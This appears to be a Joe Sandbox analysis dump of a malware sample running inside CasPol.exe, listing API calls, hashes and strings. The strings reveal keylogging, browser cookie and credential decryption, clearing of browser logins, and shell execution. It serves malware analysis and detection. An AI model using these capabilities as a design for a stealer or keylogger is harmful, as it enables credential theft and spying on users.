• Opcode ID: 1153397b0ef98b1b758b13ed2a4ada686c8c2e04d8d90db1aa4fc91eae461d34
• Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
• Opcode Fuzzy Hash: 1153397b0ef98b1b758b13ed2a4ada686c8c2e04d8d90db1aa4fc91eae461d34
• Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
APIs
  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
Strings
• User Data\Profile ?\Network\Cookies, xrefs: 0040C670
• User Data\Default\Network\Cookies, xrefs: 0040C63E
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
• Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
• Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
• Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
APIs
  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
Strings
• User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
• User Data\Default\Network\Cookies, xrefs: 0040C70D
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
• Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
• Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
• Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
• wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
• Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
• Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
• Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
• Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
• CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
• Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
• Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
• Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
APIs
• LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
• GetProcAddress.KERNEL32(00000000), ref: 00406AC4
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: CryptUnprotectData$crypt32
• API String ID: 2574300362-2380590389
• Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
• Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
• Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
• Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
• CloseHandle.KERNEL32(?), ref: 004051CA
• SetEvent.KERNEL32(?), ref: 004051D9
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
• Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
• Opcode Fuzzy Hash: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
• Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                                                                                                                                                          APIs
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                                                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                                                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 3628047217-1405518554
                                                                                                                                                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 3677997916-2591199288
                                                                                                                                                                          • Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                                                                          • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                                                                                                          • Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                                                                          • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 186401046-604454484
                                                                                                                                                                          • Opcode ID: c28b7efb6e9b123e9bbf35ecfc69271c77d7c0d816cf9c8e66969055ba9ab20b
                                                                                                                                                                          • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                                                                                                                                          • Opcode Fuzzy Hash: c28b7efb6e9b123e9bbf35ecfc69271c77d7c0d816cf9c8e66969055ba9ab20b
                                                                                                                                                                          • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                          • String ID: /C $cmd.exe$open
                                                                                                                                                                          • API String ID: 587946157-3896048727
                                                                                                                                                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,xtv,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                          • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
• Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
• Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
• Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
• Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
• GetProcAddress.KERNEL32(00000000), ref: 0040141B
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
• Opcode ID: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
• Instruction ID: dd969ba971dbaa29921178884ad428293cf5128bfb63f122c38d39e9abecacc1
• Opcode Fuzzy Hash: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
• Instruction Fuzzy Hash: 3EB09B74541740FB8F102B745D4D5153525A604703B100475F041D6151D7B584009A1E
APIs
• LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
• GetProcAddress.KERNEL32(00000000), ref: 004014C0
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
• Opcode ID: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
• Instruction ID: c0691e7ba4e037ba5be4177d0f13c81de84985c40ff74287bb3597843e96be7a
• Opcode Fuzzy Hash: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
• Instruction Fuzzy Hash: 5FB092B8580340FBCB002BA0AD4E91E3A64AA18703B1008ABF041D21A1EBB888009F2F
APIs
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
• Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
• Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
• Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
APIs
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
• Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
• Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
• Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
• Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
• Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
• Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
• __freea.LIBCMT ref: 100087D5
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
• Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
APIs
Strings
• [Cleared browsers logins and cookies.], xrefs: 0040C11F
• Cleared browsers logins and cookies., xrefs: 0040C130
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: a73d71a880a73223254e5f03a8505615f8b3103e8cb97acb8028f95b4e73a55e
• Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
• Opcode Fuzzy Hash: a73d71a880a73223254e5f03a8505615f8b3103e8cb97acb8028f95b4e73a55e
• Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
APIs
• EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
• EnumDisplayDevicesW.USER32(?), ref: 00419560
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DisplayEnum$Devices$Monitors
• String ID:
• API String ID: 1432082543-0
• Opcode ID: c58b57dd9af4a49378f42194896e7d036c46d7cd0d1b3e9acb4da555486fb0a3
• Instruction ID: 4e205714844368780eb3fe3bece650c19c238011f91973e0c27c34c3c25c0944
• Opcode Fuzzy Hash: c58b57dd9af4a49378f42194896e7d036c46d7cd0d1b3e9acb4da555486fb0a3
• Instruction Fuzzy Hash: D821A0721083016BD321DF16DC88DABBBECEBE1754F00052FF449D2190EBB4DA49C66A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
